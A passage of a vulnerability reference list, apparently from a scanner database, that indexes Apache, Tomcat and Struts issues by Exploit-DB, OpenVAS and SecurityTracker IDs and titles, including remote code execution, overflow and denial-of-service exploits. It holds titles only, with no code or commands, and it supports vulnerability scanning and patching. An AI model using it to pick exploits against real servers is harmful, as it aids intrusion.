7366| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
7367| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
7368| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
7369| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
7370| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
7371| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
7372| [21719] Apache 2.0 Path Disclosure Vulnerability
7373| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
7374| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
7375| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
7376| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
7377| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
7378| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
7379| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
7380| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
7381| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
7382| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
7383| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
7384| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
7385| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
7386| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
7387| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
7388| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
7389| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
7390| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
7391| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
7392| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
7393| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
7394| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
7395| [20558] Apache 1.2 Web Server DoS Vulnerability
7396| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
7397| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
7398| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
7399| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
7400| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
7401| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
7402| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
7403| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
7404| [19231] PHP apache_request_headers Function Buffer Overflow
7405| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
7406| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
7407| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
7408| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
7409| [18442] Apache httpOnly Cookie Disclosure
7410| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
7411| [18221] Apache HTTP Server Denial of Service
7412| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
7413| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
7414| [17691] Apache Struts < 2.2.0 - Remote Command Execution
7415| [16798] Apache mod_jk 1.2.20 Buffer Overflow
7416| [16782] Apache Win32 Chunked Encoding
7417| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
7418| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
7419| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
7420| [15319] Apache 2.2 (Windows) Local Denial of Service
7421| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
7422| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
7423| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
7424| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
7425| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
7426| [12330] Apache OFBiz - Multiple XSS
7427| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
7428| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
7429| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
7430| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
7431| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
7432| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
7433| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
7434| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
7435| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
7436| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
7437| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
7438| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
7439| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
7440| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
7441| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
7442| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
7443| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
7444| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
7445| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
7446| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
7447| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
7448| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
7449| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
7450| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
7451| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
7452| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
7453| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
7454| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
7455| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
7456| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
7457| [466] htpasswd Apache 1.3.31 - Local Exploit
7458| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
7459| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
7460| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
7461| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
7462| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
7463| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
7464| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
7465| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
7466| [9] Apache HTTP Server 2.x Memory Leak Exploit
7467|
7468| OpenVAS (Nessus) - http://www.openvas.org:
7469| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
7470| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
7471| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
7472| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
7473| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
7474| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
7475| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
7476| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
7477| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
7478| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
7479| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
7480| [900571] Apache APR-Utils Version Detection
7481| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
7482| [900496] Apache Tiles Multiple XSS Vulnerability
7483| [900493] Apache Tiles Version Detection
7484| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
7485| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
7486| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
7487| [870175] RedHat Update for apache RHSA-2008:0004-01
7488| [864591] Fedora Update for apache-poi FEDORA-2012-10835
7489| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
7490| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
7491| [864250] Fedora Update for apache-poi FEDORA-2012-7683
7492| [864249] Fedora Update for apache-poi FEDORA-2012-7686
7493| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
7494| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
7495| [855821] Solaris Update for Apache 1.3 122912-19
7496| [855812] Solaris Update for Apache 1.3 122911-19
7497| [855737] Solaris Update for Apache 1.3 122911-17
7498| [855731] Solaris Update for Apache 1.3 122912-17
7499| [855695] Solaris Update for Apache 1.3 122911-16
7500| [855645] Solaris Update for Apache 1.3 122912-16
7501| [855587] Solaris Update for kernel update and Apache 108529-29
7502| [855566] Solaris Update for Apache 116973-07
7503| [855531] Solaris Update for Apache 116974-07
7504| [855524] Solaris Update for Apache 2 120544-14
7505| [855494] Solaris Update for Apache 1.3 122911-15
7506| [855478] Solaris Update for Apache Security 114145-11
7507| [855472] Solaris Update for Apache Security 113146-12
7508| [855179] Solaris Update for Apache 1.3 122912-15
7509| [855147] Solaris Update for kernel update and Apache 108528-29
7510| [855077] Solaris Update for Apache 2 120543-14
7511| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
7512| [850088] SuSE Update for apache2 SUSE-SA:2007:061
7513| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
7514| [841209] Ubuntu Update for apache2 USN-1627-1
7515| [840900] Ubuntu Update for apache2 USN-1368-1
7516| [840798] Ubuntu Update for apache2 USN-1259-1
7517| [840734] Ubuntu Update for apache2 USN-1199-1
7518| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
7519| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
7520| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
7521| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
7522| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
7523| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
7524| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
7525| [835253] HP-UX Update for Apache Web Server HPSBUX02645
7526| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
7527| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
7528| [835236] HP-UX Update for Apache with PHP HPSBUX02543
7529| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
7530| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
7531| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
7532| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
7533| [835188] HP-UX Update for Apache HPSBUX02308
7534| [835181] HP-UX Update for Apache With PHP HPSBUX02332
7535| [835180] HP-UX Update for Apache with PHP HPSBUX02342
7536| [835172] HP-UX Update for Apache HPSBUX02365
7537| [835168] HP-UX Update for Apache HPSBUX02313
7538| [835148] HP-UX Update for Apache HPSBUX01064
7539| [835139] HP-UX Update for Apache with PHP HPSBUX01090
7540| [835131] HP-UX Update for Apache HPSBUX00256
7541| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
7542| [835104] HP-UX Update for Apache HPSBUX00224
7543| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
7544| [835101] HP-UX Update for Apache HPSBUX01232
7545| [835080] HP-UX Update for Apache HPSBUX02273
7546| [835078] HP-UX Update for ApacheStrong HPSBUX00255
7547| [835044] HP-UX Update for Apache HPSBUX01019
7548| [835040] HP-UX Update for Apache PHP HPSBUX00207
7549| [835025] HP-UX Update for Apache HPSBUX00197
7550| [835023] HP-UX Update for Apache HPSBUX01022
7551| [835022] HP-UX Update for Apache HPSBUX02292
7552| [835005] HP-UX Update for Apache HPSBUX02262
7553| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
7554| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
7555| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
7556| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
7557| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
7558| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
7559| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
7560| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
7561| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
7562| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
7563| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
7564| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
7565| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
7566| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
7567| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
7568| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
7569| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
7570| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
7571| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
7572| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
7573| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
7574| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
7575| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
7576| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
7577| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
7578| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
7579| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
7580| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
7581| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
7582| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
7583| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
7584| [801942] Apache Archiva Multiple Vulnerabilities
7585| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
7586| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
7587| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
7588| [801284] Apache Derby Information Disclosure Vulnerability
7589| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
7590| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
7591| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
7592| [800680] Apache APR Version Detection
7593| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
7594| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
7595| [800677] Apache Roller Version Detection
7596| [800279] Apache mod_jk Module Version Detection
7597| [800278] Apache Struts Cross Site Scripting Vulnerability
7598| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
7599| [800276] Apache Struts Version Detection
7600| [800271] Apache Struts Directory Traversal Vulnerability
7601| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
7602| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
7603| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
7604| [103122] Apache Web Server ETag Header Information Disclosure Weakness
7605| [103074] Apache Continuum Cross Site Scripting Vulnerability
7606| [103073] Apache Continuum Detection
7607| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
7608| [101023] Apache Open For Business Weak Password security check
7609| [101020] Apache Open For Business HTML injection vulnerability
7610| [101019] Apache Open For Business service detection
7611| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
7612| [100923] Apache Archiva Detection
7613| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
7614| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
7615| [100813] Apache Axis2 Detection
7616| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
7617| [100795] Apache Derby Detection
7618| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
7619| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
7620| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
7621| [100514] Apache Multiple Security Vulnerabilities
7622| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
7623| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
7624| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
7625| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
7626| [72626] Debian Security Advisory DSA 2579-1 (apache2)
7627| [72612] FreeBSD Ports: apache22
7628| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
7629| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
7630| [71512] FreeBSD Ports: apache
7631| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
7632| [71256] Debian Security Advisory DSA 2452-1 (apache2)
7633| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
7634| [70737] FreeBSD Ports: apache
7635| [70724] Debian Security Advisory DSA 2405-1 (apache2)
7636| [70600] FreeBSD Ports: apache
7637| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
7638| [70235] Debian Security Advisory DSA 2298-2 (apache2)
7639| [70233] Debian Security Advisory DSA 2298-1 (apache2)
7640| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
7641| [69338] Debian Security Advisory DSA 2202-1 (apache2)
7642| [67868] FreeBSD Ports: apache
7643| [66816] FreeBSD Ports: apache
7644| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
7645| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
7646| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
7647| [66081] SLES11: Security update for Apache 2
7648| [66074] SLES10: Security update for Apache 2
7649| [66070] SLES9: Security update for Apache 2
7650| [65998] SLES10: Security update for apache2-mod_python
7651| [65893] SLES10: Security update for Apache 2
7652| [65888] SLES10: Security update for Apache 2
7653| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
7654| [65510] SLES9: Security update for Apache 2
7655| [65472] SLES9: Security update for Apache
7656| [65467] SLES9: Security update for Apache
7657| [65450] SLES9: Security update for apache2
7658| [65390] SLES9: Security update for Apache2
7659| [65363] SLES9: Security update for Apache2
7660| [65309] SLES9: Security update for Apache and mod_ssl
7661| [65296] SLES9: Security update for webdav apache module
7662| [65283] SLES9: Security update for Apache2
7663| [65249] SLES9: Security update for Apache 2
7664| [65230] SLES9: Security update for Apache 2
7665| [65228] SLES9: Security update for Apache 2
7666| [65212] SLES9: Security update for apache2-mod_python
7667| [65209] SLES9: Security update for apache2-worker
7668| [65207] SLES9: Security update for Apache 2
7669| [65168] SLES9: Security update for apache2-mod_python
7670| [65142] SLES9: Security update for Apache2
7671| [65136] SLES9: Security update for Apache 2
7672| [65132] SLES9: Security update for apache
7673| [65131] SLES9: Security update for Apache 2 oes/CORE
7674| [65113] SLES9: Security update for apache2
7675| [65072] SLES9: Security update for apache and mod_ssl
7676| [65017] SLES9: Security update for Apache 2
7677| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
7678| [64783] FreeBSD Ports: apache
7679| [64774] Ubuntu USN-802-2 (apache2)
7680| [64653] Ubuntu USN-813-2 (apache2)
7681| [64559] Debian Security Advisory DSA 1834-2 (apache2)
7682| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
7683| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
7684| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
7685| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
7686| [64443] Ubuntu USN-802-1 (apache2)
7687| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
7688| [64423] Debian Security Advisory DSA 1834-1 (apache2)
7689| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
7690| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
7691| [64251] Debian Security Advisory DSA 1816-1 (apache2)
7692| [64201] Ubuntu USN-787-1 (apache2)
7693| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
7694| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
7695| [63565] FreeBSD Ports: apache
7696| [63562] Ubuntu USN-731-1 (apache2)
7697| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
7698| [61185] FreeBSD Ports: apache
7699| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
7700| [60387] Slackware Advisory SSA:2008-045-02 apache
7701| [58826] FreeBSD Ports: apache-tomcat
7702| [58825] FreeBSD Ports: apache-tomcat
7703| [58804] FreeBSD Ports: apache
7704| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
7705| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
7706| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
7707| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
7708| [57335] Debian Security Advisory DSA 1167-1 (apache)
7709| [57201] Debian Security Advisory DSA 1131-1 (apache)
7710| [57200] Debian Security Advisory DSA 1132-1 (apache2)
7711| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
7712| [57145] FreeBSD Ports: apache
7713| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
7714| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
7715| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
7716| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
7717| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
7718| [56067] FreeBSD Ports: apache
7719| [55803] Slackware Advisory SSA:2005-310-04 apache
7720| [55519] Debian Security Advisory DSA 839-1 (apachetop)
7721| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
7722| [55355] FreeBSD Ports: apache
7723| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
7724| [55261] Debian Security Advisory DSA 805-1 (apache2)
7725| [55259] Debian Security Advisory DSA 803-1 (apache)
7726| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
7727| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
7728| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
7729| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
7730| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
7731| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
7732| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
7733| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
7734| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
7735| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
7736| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
7737| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
7738| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
7739| [54439] FreeBSD Ports: apache
7740| [53931] Slackware Advisory SSA:2004-133-01 apache
7741| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
7742| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
7743| [53878] Slackware Advisory SSA:2003-308-01 apache security update
7744| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
7745| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
7746| [53848] Debian Security Advisory DSA 131-1 (apache)
7747| [53784] Debian Security Advisory DSA 021-1 (apache)
7748| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
7749| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
7750| [53735] Debian Security Advisory DSA 187-1 (apache)
7751| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
7752| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
7753| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
7754| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
7755| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
7756| [53282] Debian Security Advisory DSA 594-1 (apache)
7757| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
7758| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
7759| [53215] Debian Security Advisory DSA 525-1 (apache)
7760| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
7761| [52529] FreeBSD Ports: apache+ssl
7762| [52501] FreeBSD Ports: apache
7763| [52461] FreeBSD Ports: apache
7764| [52390] FreeBSD Ports: apache
7765| [52389] FreeBSD Ports: apache
7766| [52388] FreeBSD Ports: apache
7767| [52383] FreeBSD Ports: apache
7768| [52339] FreeBSD Ports: apache+mod_ssl
7769| [52331] FreeBSD Ports: apache
7770| [52329] FreeBSD Ports: ru-apache+mod_ssl
7771| [52314] FreeBSD Ports: apache
7772| [52310] FreeBSD Ports: apache
7773| [15588] Detect Apache HTTPS
7774| [15555] Apache mod_proxy content-length buffer overflow
7775| [15554] Apache mod_include priviledge escalation
7776| [14771] Apache <= 1.3.33 htpasswd local overflow
7777| [14177] Apache mod_access rule bypass
7778| [13644] Apache mod_rootme Backdoor
7779| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
7780| [12280] Apache Connection Blocking Denial of Service
7781| [12239] Apache Error Log Escape Sequence Injection
7782| [12123] Apache Tomcat source.jsp malformed request information disclosure
7783| [12085] Apache Tomcat servlet/JSP container default files
7784| [11438] Apache Tomcat Directory Listing and File disclosure
7785| [11204] Apache Tomcat Default Accounts
7786| [11092] Apache 2.0.39 Win32 directory traversal
7787| [11046] Apache Tomcat TroubleShooter Servlet Installed
7788| [11042] Apache Tomcat DOS Device Name XSS
7789| [11041] Apache Tomcat /servlet Cross Site Scripting
7790| [10938] Apache Remote Command Execution via .bat files
7791| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
7792| [10773] MacOS X Finder reveals contents of Apache Web files
7793| [10766] Apache UserDir Sensitive Information Disclosure
7794| [10756] MacOS X Finder reveals contents of Apache Web directories
7795| [10752] Apache Auth Module SQL Insertion Attack
7796| [10704] Apache Directory Listing
7797| [10678] Apache /server-info accessible
7798| [10677] Apache /server-status accessible
7799| [10440] Check for Apache Multiple / vulnerability
7800|
7801| SecurityTracker - https://www.securitytracker.com:
7802| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
7803| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
7804| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
7805| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
7806| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
7807| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
7808| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
7809| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
7810| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
7811| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
7812| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
7813| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
7814| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
7815| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
7816| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
